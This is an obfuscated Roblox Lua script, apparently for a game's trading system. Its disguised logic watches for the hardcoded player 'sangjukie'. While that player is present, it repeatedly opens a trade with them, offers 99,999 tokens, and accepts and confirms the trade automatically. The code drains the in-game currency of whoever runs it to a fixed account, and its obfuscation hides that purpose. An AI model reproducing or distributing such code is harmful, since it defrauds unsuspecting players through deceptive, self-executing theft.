--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0="sangjukie";local v1=9 + 1 ;local v2=6 + 1 ;local v3=2 + 3 ;local v4=1 + 4 ;local v5=100876 -(282 + 595) ;local v6=game:GetService("Players");local v7=game:GetService("ReplicatedStorage");local v8=v6.LocalPlayer;local v9=v7:WaitForChild("GameEvents"):WaitForChild("TradeEvents");local v10=false;local function v11() local v20=1637 -(1523 + 114) ;local v21;local v22;while true do if (v20==(1 + 0)) then for v35,v36 in ipairs(v8.Backpack:GetChildren()) do if (v36:IsA("Tool") and v36.Name:find("Trading Ticket")) then v22:EquipTool(v36);break;end end break;end if (v20==0) then v21=v8.Character or v8.CharacterAdded:Wait() ;v22=v21:WaitForChild("Humanoid");v20=1 -0 ;end end end local function v12() local v23=1065 -(68 + 997) ;local v24;local v25;while true do if (v23==(1270 -(226 + 1044))) then v24=v8.Character;if  not v24 then return;end v23=1;end if (v23==1) then v25=v24:FindFirstChildOfClass("Humanoid");if v25 then v25:UnequipTools();end break;end end end local v13=game:GetService("GuiService");local v13=game:GetService("GuiService");local v14=game:GetService("VirtualInputManager");local function v15() local v26=v8:WaitForChild("PlayerGui");local v27=v26:WaitForChild("Teleport_UI"):WaitForChild("TradePlaza"):WaitForChild("Booth");v13.SelectedObject=v27;task.wait(0.2);v13:Select(v27);task.wait(0.2 -0 );v14:SendKeyEvent(true,Enum.KeyCode.Return,false,game);v14:SendKeyEvent(false,Enum.KeyCode.Return,false,game);end local function v16() v13.SelectedObject=nil;end local function v17() local v30=117 -(32 + 85) ;while true do if (v30==0) then while v10 do local v37=v6:FindFirstChild(v0);if  not v37 then v10=false;break;end v15();task.wait(1 + 0 );v16();v11();task.wait(1);v9.SendRequest:FireServer(v37);task.wait(1 + 0 );v12();task.wait(958 -(892 + 65) );v9.SetTokens:FireServer(v5);task.wait(8);v9.Accept:FireServer();task.wait(1 -0 );v9.Confirm:FireServer();end print("[AUTO TRADE] STOPPED");break;end end end local function v18() if v10 then return;end v10=true;print("[AUTO TRADE] START");task.spawn(v17);end local function v19() local v31=0 -0 ;while true do if (v31==(350 -(87 + 263))) then v10=false;print("[AUTO TRADE] STOP");break;end end end if v6:FindFirstChild(v0) then v18();end v6.PlayerAdded:Connect(function(v32) if (v32.Name==v0) then v18();end end);v6.PlayerRemoving:Connect(function(v33) if (v33.Name==v0) then v19();end end);
